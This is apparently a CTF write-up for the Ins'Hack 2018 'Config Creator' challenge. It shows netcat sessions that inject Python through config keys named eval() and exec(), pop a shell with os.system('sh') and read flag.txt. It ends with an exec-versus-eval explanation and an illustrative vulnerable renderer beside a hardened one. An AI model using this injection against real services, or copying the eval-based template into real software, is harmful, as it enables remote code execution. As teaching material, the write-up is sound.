Ins'Hack 2018 - Config Creator (MISC)
I’ve just written a small utility to create a config file (which are sooo painful to write by hand, right?). Care to have a look?
nc config-creator.ctf.insecurity-insa.fr 10000
Find the fuck
After playing with the service a little, it quickly becomes apparent that a value can be evaluated by adding a second key that wraps an existing key's name in eval():
switch :: ~ » nc config-creator.ctf.insecurity-insa.fr 10000
Welcome to the config creator!
Please choose your action:
1. Register a new config entry
2. Change value of an existing config entry
3. Show my template
4. Show my config
5. Reset current config
6. exit
Choice? 1
Config key? test
Config value? 1+1
Please choose your action:
1. Register a new config entry
2. Change value of an existing config entry
3. Show my template
4. Show my config
5. Reset current config
6. exit
Choice? 1
Config key? eval(test)
Config value? nope
Please choose your action:
1. Register a new config entry
2. Change value of an existing config entry
3. Show my template
4. Show my config
5. Reset current config
6. exit
Choice? 4
config:
configuration [
test = 1+1;
eval(test) = 2;
]
Please choose your action:
1. Register a new config entry
2. Change value of an existing config entry
3. Show my template
4. Show my config
5. Reset current config
6. exit
Choice?
Building the payload
All that remains is to find a way to run a shell on the target. Naturally, the os module and its system function come to mind, while hoping that it has not been removed from the jail!
nc config-creator.ctf.insecurity-insa.fr 10000
Welcome to the config creator!
Please choose your action:
1. Register a new config entry
2. Change value of an existing config entry
3. Show my template
4. Show my config
5. Reset current config
6. exit
Choice? 1
Config key? one
Config value? import os
Please choose your action:
1. Register a new config entry
2. Change value of an existing config entry
3. Show my template
4. Show my config
5. Reset current config
6. exit
Choice? 1
Config key? exec(one)
Config value? fe
Please choose your action:
1. Register a new config entry
2. Change value of an existing config entry
3. Show my template
4. Show my config
5. Reset current config
6. exit
Choice? 4
config:
configuration [
one = import os;
exec(one) = None;
]
Please choose your action:
1. Register a new config entry
2. Change value of an existing config entry
3. Show my template
4. Show my config
5. Reset current config
6. exit
Choice? 1
Config key? next
Config value? os.system("sh")
Please choose your action:
1. Register a new config entry
2. Change value of an existing config entry
3. Show my template
4. Show my config
5. Reset current config
6. exit
Choice? 1
Config key? eval(next)
Config value? fr
Please choose your action:
1. Register a new config entry
2. Change value of an existing config entry
3. Show my template
4. Show my config
5. Reset current config
6. exit
Choice? 4
id
uid=1000(config-creator) gid=1000(config-creator) groups=1000(config-creator)
ls
app.py
flag.txt
cat flag.txt
INSA{dont_get_me_wrong_i_love_python36}
Python has two built-in functions that look alike: exec and eval. However, they do not do the same thing.
eval simply evaluates an expression and returns its result: eval("1+1") => 2
exec executes Python code dynamically, so it can use logical structures, functions or even import: exec("a = 5") => None
- https://docs.python.org/3/library/functions.html#eval
- http://lucumr.pocoo.org/2011/2/1/exec-in-python/
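
The behaviour seen in the sessions above, as an added example that is not the challenge's app.py (the page does not show that file): `render_unsafe` is a hypothetical reconstruction that assumes keys are spliced into an f-string template, and `render_safe` is a hardened counterpart that only ever formats keys and values as text. `ENTRIES`, `KEY_RE` and both function names are assumptions.

```python
import re

# Constructed entries mirroring the first session on this page (key -> value).
ENTRIES = {"test": "1+1", "eval(test)": "nope"}

# Assumed policy: keys are short identifier-like names, nothing else.
KEY_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_.-]{0,63}")


def render_unsafe(entries):
    """Hypothetical reconstruction of the flaw: keys become f-string fields."""
    body = "".join(f"{key} = {{{key}}};\n" for key in entries)
    template = 'f"""configuration [\n' + body + ']"""'
    # Identifier-like keys are bound as variables holding their raw value;
    # any other key is still spliced into the template and run as code.
    scope = {k: v for k, v in entries.items() if k.isidentifier()}
    return eval(template, scope)


def render_safe(entries):
    """Hardened form: keys and values are only ever formatted as text."""
    lines = []
    for key, value in entries.items():
        if not KEY_RE.fullmatch(key):
            raise ValueError(f"invalid config key: {key!r}")
        if "\n" in value or "\r" in value or ";" in value:
            raise ValueError(f"invalid value for {key!r}")
        lines.append(f"{key} = {value};")
    return "configuration [\n" + "\n".join(lines) + "\n]"


if __name__ == "__main__":
    print(render_unsafe(ENTRIES))  # the key eval(test) is evaluated
    try:
        render_safe(ENTRIES)
    except ValueError as err:
        print("rejected:", err)
```

The unsafe renderer reproduces the `eval(test) = 2;` line from the first session, while the hardened one rejects the same key before anything is rendered.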